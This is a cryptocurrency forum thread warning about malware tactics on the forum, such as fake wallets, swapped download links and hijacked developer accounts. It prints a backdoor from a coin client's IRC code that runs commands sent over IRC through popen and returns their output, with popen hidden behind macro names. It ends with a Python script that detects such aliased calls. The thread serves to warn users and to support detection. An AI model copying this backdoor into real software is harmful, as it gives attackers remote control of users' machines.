Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 46. (Read 860900 times)

legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol
newbie
Activity: 33
Merit: 0
The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

https://i.imgur.com/xzj6fWl.png
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched for an address and was left with having to fight virus scan pop-ups for a few minutes.
sr. member
Activity: 439
Merit: 288
I'd like to add bitcoinwisdomapp.com to the blacklist. There's a keylogger behind it.
sr. member
Activity: 264
Merit: 250
Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.
newbie
Activity: 33
Merit: 0
hero member
Activity: 550
Merit: 501
I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by an exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

sr. member
Activity: 252
Merit: 250
Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but it's not Kaspersky enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coin ones) like DOGE, LTC, BTC and a few more?
member
Activity: 108
Merit: 10
Could you please post the coin's name and maybe others that you may have found ?
legendary
Activity: 2058
Merit: 1452
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Trigger: an IRC PRIVMSG whose text begins with ":!" followed by a command
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The remainder of the IRC line is handed to the shell via popen
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from ":nick!user@host" and reply with the command output
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
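The trick that makes this backdoor easy to miss is that popen and pclose are hidden behind innocuous-looking macro names, so a plain grep of the source for "popen" finds nothing. As an added example (not code from the thread or from the coin's source), the following Python audit script resolves #define alias chains and flags any call that ultimately reaches a process-spawning function; the C++ snippet it scans is constructed to mirror the pattern above.

```python
import re

# Functions that hand a string to a shell or spawn a process. A backdoor that
# aliases one of these behind a #define evades a plain grep for the real name.
DANGEROUS = {"popen", "system", "execl", "execlp", "execv", "execvp",
             "ShellExecuteA", "WinExec"}

# Object-like macros of the form "#define NAME IDENT" (quoted strings are skipped)
DEFINE_RE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(\w+)\s*$', re.M)
# Anything that looks like a call: identifier followed by "("
CALL_RE = re.compile(r'\b(\w+)\s*\(')


def resolve_aliases(source):
    """Map every macro name to the identifier it ultimately expands to."""
    direct = dict(DEFINE_RE.findall(source))
    resolved = {}
    for name in direct:
        seen, cur = set(), name
        while cur in direct and cur not in seen:  # follow #define chains, stop on cycles
            seen.add(cur)
            cur = direct[cur]
        resolved[name] = cur
    return resolved


def find_hidden_calls(source):
    """Return (line_no, alias, real_function) for each call reaching a dangerous
    function, whether it is called directly or through a macro alias."""
    aliases = resolve_aliases(source)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # the #define lines themselves are not call sites
        for ident in CALL_RE.findall(line):
            real = aliases.get(ident, ident)
            if real in DANGEROUS:
                hits.append((lineno, ident, real))
    return hits


# Constructed sample mirroring the macro-aliasing pattern (not the coin's real source)
SAMPLE = """\
#define CBuff "PRIVMSG"
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
"""

if __name__ == "__main__":
    for lineno, alias, real in find_hidden_calls(SAMPLE):
        print(f"line {lineno}: {alias}(...) expands to {real}()")
```

Running the script over a real source tree would mean reading each .cpp/.h file into `find_hidden_calls`; the same alias map also catches a macro that is itself defined in a different header than the call site.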